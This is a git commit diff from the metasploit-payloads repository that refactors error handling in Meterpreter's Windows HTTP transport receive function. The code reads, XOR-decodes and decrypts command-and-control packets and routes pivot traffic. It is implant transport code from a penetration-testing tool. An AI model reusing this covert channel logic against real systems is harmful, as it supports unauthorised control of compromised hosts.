github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-01-20 20:37:27 +01:00
Code Releases Activity

remove do/while(0) exception anti-pattern

Browse Source
This commit is contained in:
Brent Cook 2017-11-06 08:05:49 -06:00
parent 2dc48bea43
commit 0548a12f3c
1 changed files with 138 additions and 146 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

284
c/meterpreter/source/server/win/server_transport_winhttp.c
View File

@ -340,178 +340,170 @@ static DWORD packet_receive_http(Remote *remote, Packet **packet)
lock_acquire(remote->lock); lock_acquire(remote->lock);
do hReq = ctx->create_req(ctx, TRUE, "PACKET RECEIVE");
if (hReq == NULL)
{ {
hReq = ctx->create_req(ctx, TRUE, "PACKET RECEIVE"); goto out;
if (hReq == NULL) }
{
break;
}
vdprintf("[PACKET RECEIVE HTTP] sending GET"); vdprintf("[PACKET RECEIVE HTTP] sending GET");
hRes = ctx->send_req(hReq, NULL, 0); hRes = ctx->send_req(hReq, NULL, 0);
if (!hRes) if (!hRes)
{
dprintf("[PACKET RECEIVE HTTP] Failed send_req: %d %d", GetLastError(), WSAGetLastError());
SetLastError(ERROR_NOT_FOUND);
goto out;
}
vdprintf("[PACKET RECEIVE HTTP] Waiting to see the response ...");
if (ctx->receive_response && !ctx->receive_response(hReq))
{
vdprintf("[PACKET RECEIVE] Failed receive: %d", GetLastError());
SetLastError(ERROR_NOT_FOUND);
goto out;
}
SetLastError(ctx->validate_response(hReq, ctx));
if (GetLastError() != ERROR_SUCCESS)
{
goto out;
}
// Read the packet length
retries = 3;
vdprintf("[PACKET RECEIVE HTTP] Start looping through the receive calls");
while (inHeader && retries > 0)
{
retries--;
if (!ctx->read_response(hReq, (PUCHAR)&header + headerBytes, sizeof(PacketHeader)-headerBytes, &bytesRead))
{ {
dprintf("[PACKET RECEIVE HTTP] Failed send_req: %d %d", GetLastError(), WSAGetLastError()); dprintf("[PACKET RECEIVE HTTP] Failed HEADER read_response: %d", GetLastError());
SetLastError(ERROR_NOT_FOUND); SetLastError(ERROR_NOT_FOUND);
break; goto out;
} }
vdprintf("[PACKET RECEIVE HTTP] Waiting to see the response ..."); vdprintf("[PACKET RECEIVE NHTTP] Data received: %u bytes", bytesRead);
if (ctx->receive_response && !ctx->receive_response(hReq))
// If the response contains no data, this is fine, it just means the
// remote side had nothing to tell us. Indicate this through a
// ERROR_EMPTY response code so we can update the timestamp.
if (bytesRead == 0)
{ {
vdprintf("[PACKET RECEIVE] Failed receive: %d", GetLastError()); SetLastError(ERROR_EMPTY);
SetLastError(ERROR_NOT_FOUND); goto out;
break;
} }
SetLastError(ctx->validate_response(hReq, ctx)); headerBytes += bytesRead;
if (GetLastError() != ERROR_SUCCESS)
{
// something went wrong, so break
break;
}
// Read the packet length
retries = 3;
vdprintf("[PACKET RECEIVE HTTP] Start looping through the receive calls");
while (inHeader && retries > 0)
{
retries--;
if (!ctx->read_response(hReq, (PUCHAR)&header + headerBytes, sizeof(PacketHeader)-headerBytes, &bytesRead))
{
dprintf("[PACKET RECEIVE HTTP] Failed HEADER read_response: %d", GetLastError());
SetLastError(ERROR_NOT_FOUND);
break;
}
vdprintf("[PACKET RECEIVE NHTTP] Data received: %u bytes", bytesRead);
// If the response contains no data, this is fine, it just means the
// remote side had nothing to tell us. Indicate this through a
// ERROR_EMPTY response code so we can update the timestamp.
if (bytesRead == 0)
{
SetLastError(ERROR_EMPTY);
break;
}
headerBytes += bytesRead;
if (headerBytes != sizeof(PacketHeader))
{
continue;
}
inHeader = FALSE;
}
if (GetLastError() == ERROR_EMPTY)
{
break;
}
if (headerBytes != sizeof(PacketHeader)) if (headerBytes != sizeof(PacketHeader))
{ {
dprintf("[PACKET RECEIVE HTTP] headerBytes no valid"); continue;
}
inHeader = FALSE;
}
if (headerBytes != sizeof(PacketHeader))
{
dprintf("[PACKET RECEIVE HTTP] headerBytes not valid");
SetLastError(ERROR_NOT_FOUND);
goto out;
}
dprintf("[PACKET RECEIVE HTTP] decoding header");
PacketHeader encodedHeader;
memcpy(&encodedHeader, &header, sizeof(PacketHeader));
xor_bytes(header.xor_key, (PUCHAR)&header + sizeof(header.xor_key), sizeof(PacketHeader) - sizeof(header.xor_key));
#ifdef DEBUGTRACE
PUCHAR h = (PUCHAR)&header;
vdprintf("[HTTP] Packet header: [0x%02X 0x%02X 0x%02X 0x%02X] [0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X] [0x%02X 0x%02X 0x%02X 0x%02X] [0x%02X 0x%02X 0x%02X 0x%02X] [0x%02X 0x%02X 0x%02X 0x%02X]",
h[0], h[1], h[2], h[3], h[4], h[5], h[6], h[7], h[8], h[9], h[10], h[11], h[12], h[13], h[14], h[15], h[16], h[17], h[18], h[19], h[20], h[21], h[22], h[23], h[24], h[25], h[26], h[27], h[28], h[29], h[30], h[31]);
#endif
payloadLength = ntohl(header.length) - sizeof(TlvHeader);
vdprintf("[REC HTTP] Payload length is %d", payloadLength);
DWORD packetSize = sizeof(PacketHeader) + payloadLength;
vdprintf("[REC HTTP] total buffer size for the packet is %d", packetSize);
payloadBytesLeft = payloadLength;
// Allocate the payload
if (!(packetBuffer = (PUCHAR)malloc(packetSize)))
{
dprintf("[REC HTTP] Failed to create the packet buffer");
SetLastError(ERROR_NOT_ENOUGH_MEMORY);
goto out;
}
dprintf("[REC HTTP] Allocated packet buffer at %p", packetBuffer);
// Copy the packet header stuff over to the packet
memcpy_s(packetBuffer, sizeof(PacketHeader), (LPBYTE)&encodedHeader, sizeof(PacketHeader));
LPBYTE payload = packetBuffer + sizeof(PacketHeader);
// Read the payload
retries = payloadBytesLeft;
while (payloadBytesLeft > 0 && retries > 0)
{
vdprintf("[PACKET RECEIVE HTTP] reading more data from the body...");
retries--;
if (!ctx->read_response(hReq, payload + payloadLength - payloadBytesLeft, payloadBytesLeft, &bytesRead))
{
dprintf("[PACKET RECEIVE] Failed BODY read_response: %d", GetLastError());
SetLastError(ERROR_NOT_FOUND); SetLastError(ERROR_NOT_FOUND);
break; goto out;
} }
dprintf("[PACKET RECEIVE HTTP] decoding header"); if (!bytesRead)
PacketHeader encodedHeader; {
memcpy(&encodedHeader, &header, sizeof(PacketHeader)); vdprintf("[PACKET RECEIVE HTTP] no bytes read, bailing out");
xor_bytes(header.xor_key, (PUCHAR)&header + sizeof(header.xor_key), sizeof(PacketHeader) - sizeof(header.xor_key)); SetLastError(ERROR_NOT_FOUND);
goto out;
}
vdprintf("[PACKET RECEIVE HTTP] bytes read: %u", bytesRead);
payloadBytesLeft -= bytesRead;
}
// Didn't finish?
if (payloadBytesLeft)
{
goto out;
}
#ifdef DEBUGTRACE #ifdef DEBUGTRACE
PUCHAR h = (PUCHAR)&header; h = (PUCHAR)&header.session_guid[0];
vdprintf("[TCP] Packet header: [0x%02X 0x%02X 0x%02X 0x%02X] [0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X] [0x%02X 0x%02X 0x%02X 0x%02X] [0x%02X 0x%02X 0x%02X 0x%02X] [0x%02X 0x%02X 0x%02X 0x%02X]", dprintf("[HTTP] Packet Session GUID: %02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X",
h[0], h[1], h[2], h[3], h[4], h[5], h[6], h[7], h[8], h[9], h[10], h[11], h[12], h[13], h[14], h[15], h[16], h[17], h[18], h[19], h[20], h[21], h[22], h[23], h[24], h[25], h[26], h[27], h[28], h[29], h[30], h[31]); h[0], h[1], h[2], h[3], h[4], h[5], h[6], h[7], h[8], h[9], h[10], h[11], h[12], h[13], h[14], h[15]);
#endif
payloadLength = ntohl(header.length) - sizeof(TlvHeader);
vdprintf("[REC HTTP] Payload length is %d", payloadLength);
DWORD packetSize = sizeof(PacketHeader) + payloadLength;
vdprintf("[REC HTTP] total buffer size for the packet is %d", packetSize);
payloadBytesLeft = payloadLength;
// Allocate the payload
if (!(packetBuffer = (PUCHAR)malloc(packetSize)))
{
dprintf("[REC HTTP] Failed to create the packet buffer");
SetLastError(ERROR_NOT_ENOUGH_MEMORY);
break;
}
dprintf("[REC HTTP] Allocated packet buffer at %p", packetBuffer);
// Copy the packet header stuff over to the packet
memcpy_s(packetBuffer, sizeof(PacketHeader), (LPBYTE)&encodedHeader, sizeof(PacketHeader));
LPBYTE payload = packetBuffer + sizeof(PacketHeader);
// Read the payload
retries = payloadBytesLeft;
while (payloadBytesLeft > 0 && retries > 0)
{
vdprintf("[PACKET RECEIVE HTTP] reading more data from the body...");
retries--;
if (!ctx->read_response(hReq, payload + payloadLength - payloadBytesLeft, payloadBytesLeft, &bytesRead))
{
dprintf("[PACKET RECEIVE] Failed BODY read_response: %d", GetLastError());
SetLastError(ERROR_NOT_FOUND);
break;
}
if (!bytesRead)
{
vdprintf("[PACKET RECEIVE HTTP] no bytes read, bailing out");
SetLastError(ERROR_NOT_FOUND);
break;
}
vdprintf("[PACKET RECEIVE HTTP] bytes read: %u", bytesRead);
payloadBytesLeft -= bytesRead;
}
// Didn't finish?
if (payloadBytesLeft)
{
break;
}
#ifdef DEBUGTRACE
h = (PUCHAR)&header.session_guid[0];
dprintf("[HTTP] Packet Session GUID: %02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X",
h[0], h[1], h[2], h[3], h[4], h[5], h[6], h[7], h[8], h[9], h[10], h[11], h[12], h[13], h[14], h[15]);
#endif #endif
if (is_null_guid(header.session_guid) || memcmp(remote->orig_config->session.session_guid, header.session_guid, sizeof(header.session_guid)) == 0) if (is_null_guid(header.session_guid) || memcmp(remote->orig_config->session.session_guid, header.session_guid, sizeof(header.session_guid)) == 0)
{
dprintf("[HTTP] Session GUIDs match (or packet guid is null), decrypting packet");
SetLastError(decrypt_packet(remote, packet, packetBuffer, packetSize));
}
else
{
dprintf("[HTTP] Session GUIDs don't match, looking for a pivot");
PivotContext* pivotCtx = pivot_tree_find(remote->pivot_sessions, header.session_guid);
if (pivotCtx != NULL)
{ {
dprintf("[HTTP] Session GUIDs match (or packet guid is null), decrypting packet"); dprintf("[HTTP] Pivot found, dispatching packet on a thread (to avoid main thread blocking)");
SetLastError(decrypt_packet(remote, packet, packetBuffer, packetSize)); SetLastError(pivot_packet_dispatch(pivotCtx, packetBuffer, packetSize));
// mark this packet buffer as NULL as the thread will clean it up
packetBuffer = NULL;
*packet = NULL;
} }
else else
{ {
dprintf("[HTTP] Session GUIDs don't match, looking for a pivot"); dprintf("[HTTP] Session GUIDs don't match, can't find pivot!");
PivotContext* pivotCtx = pivot_tree_find(remote->pivot_sessions, header.session_guid);
if (pivotCtx != NULL)
{
dprintf("[HTTP] Pivot found, dispatching packet on a thread (to avoid main thread blocking)");
SetLastError(pivot_packet_dispatch(pivotCtx, packetBuffer, packetSize));
// mark this packet buffer as NULL as the thread will clean it up
packetBuffer = NULL;
*packet = NULL;
}
else
{
dprintf("[HTTP] Session GUIDs don't match, can't find pivot!");
}
} }
} while (0); }
out:
res = GetLastError(); res = GetLastError();
dprintf("[HTTP] Cleaning up"); dprintf("[HTTP] Cleaning up");